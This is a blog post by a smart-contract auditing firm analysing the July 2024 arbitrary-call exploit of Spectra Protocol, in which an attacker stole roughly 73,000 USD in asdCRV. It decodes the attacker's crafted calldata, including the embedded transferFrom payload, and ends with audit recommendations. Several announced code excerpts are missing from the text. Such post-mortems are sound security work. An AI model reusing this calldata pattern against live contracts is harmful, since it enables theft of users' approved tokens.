Spectra Protocol Hack Analysis

lunaray
3 min readJul 25, 2024

--

On July 23, 2024, we monitored an attack transaction on the Ethereum blockchain: https://etherscan.io/tx/0x491cf8b2a5753fdbf3096b42e0a16bc109b957dc112d6537b1ed306e483d0744.

The targeted project was Spectra Protocol. The Spectra protocol is permissionless, meaning its services are entirely open for public use. Anyone can create new markets at will, swap yield derivatives, or become a liquidity provider.

In this attack, the attacker profited a total of 188,013 asdCRV, equivalent to 73,325 USD.

Detailed Analysis of the Attack

First, the attacker checked the allowance of asd CRV Token from the address 0x279a7dbfae376427ffac52fcb0883147d42165ff to the Spectra Protocol and the balance of asd CRV in that address.

Next, the attacker invoked the execute function to launch the attack on Spectra Protocol. The execute function's code is as follows:

Finally, the input data leads to the call of _dispatch, with the function's code shown below:

From the above code, we can see that it determines actions based on _commandType. In this attack, _commandType was 0x12, so command = 0x12 & 0x3f = 0x12, corresponding to KYBER_SWAP.

Thus, the attacker’s code segment is as follows. We can see that the kyberRouter and targetData can be controlled, allowing the attacker to use the Spectra Protocol contract to call any contract with arbitrary parameters.

The attacker’s inputs data is parsed as follows:

00000000000000000000000043e54c2e7b3e294de3a155785f52ab49d87b9922: address(kyberRouter)
000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee: address(tokenIn)
0000000000000000000000000000000000000000000000000000000000000000: uint256(amountIn)
000000000000000000000000ba8ce86147ded54c0879c9a954f9754a472704aa: address(tokenOut)
0000000000000000000000000000000000000000000000000000000000000001: uint256
00000000000000000000000000000000000000000000000000000000000000c0: bytes index = (32 * 6)
0000000000000000000000000000000000000000000000000000000000000064: bytes length = 100
23b872dd000000000000000000000000279a7dbfae376427ffac52fcb0883147d42165ff000000000000000000000000ba8ce86147ded54c0879c9a954f9754a472704aa0000000000000000000000000000000000000000000027d03995eb8cff1bfcc300000000000000000000000000000000000000000000000000000000

We found that kyberRouter has been manipulated to the address 0x43e54c2e7b3e294de3a155785f52ab49d87b9922, tokenIn to the address 0eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee, and tokenOut to the address 0xba8ce86147ded54c0879c9a954f9754a472704aa.

We can see that Constants.ETH corresponds to 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE

So, the code follows this path:

The targetData is parsed as follows:

23b872dd: signature
000000000000000000000000279a7dbfae376427ffac52fcb0883147d42165ff
000000000000000000000000ba8ce86147ded54c0879c9a954f9754a472704aa
0000000000000000000000000000000000000000000027d03995eb8cff1bfcc3

Since the transferFrom function has the signature 0x23b872dd, the parameters for transferFrom are from = 0x279a7dbfae376427ffac52fcb0883147d42165ff, to = 0xba8ce86147ded54c0879c9a954f9754a472704aa, and value = 188,013,365,080,870,249,823,427.
Given that the kyberRouter is controlled as 0x43e54c2e7b3e294de3a155785f52ab49d87b9922, representing asdCRV Token, the attacker essentially manipulated Spectra Protocol to transfer 188,013,365,080,870,249,823,427 asdCRV from 0x279a7dbfae376427ffac52fcb0883147d42165ff to 0xba8ce86147ded54c0879c9a954f9754a472704aa (an address controlled by the attacker). Thus, the attack was successfully executed.

Summary

The vulnerability occurred because the targeted contract did not strictly validate the parameters passed by the attacker, allowing the attacker to craft specific inputData that caused the victim's contract to call any contract with arbitrary parameters. Ultimately, the attacker used these crafted parameters to have the victim's contract call transferFrom, transferring tokens authorized to the victim's contract to an address controlled by the attacker. It is recommended that project teams implement multiple layers of validation in their code logic and, during pre-launch audits, engage multiple auditing firms for cross-verification.

--

--

lunaray

Lunaray takes a leading position in smart contract auditing and consulting service for blockchain security.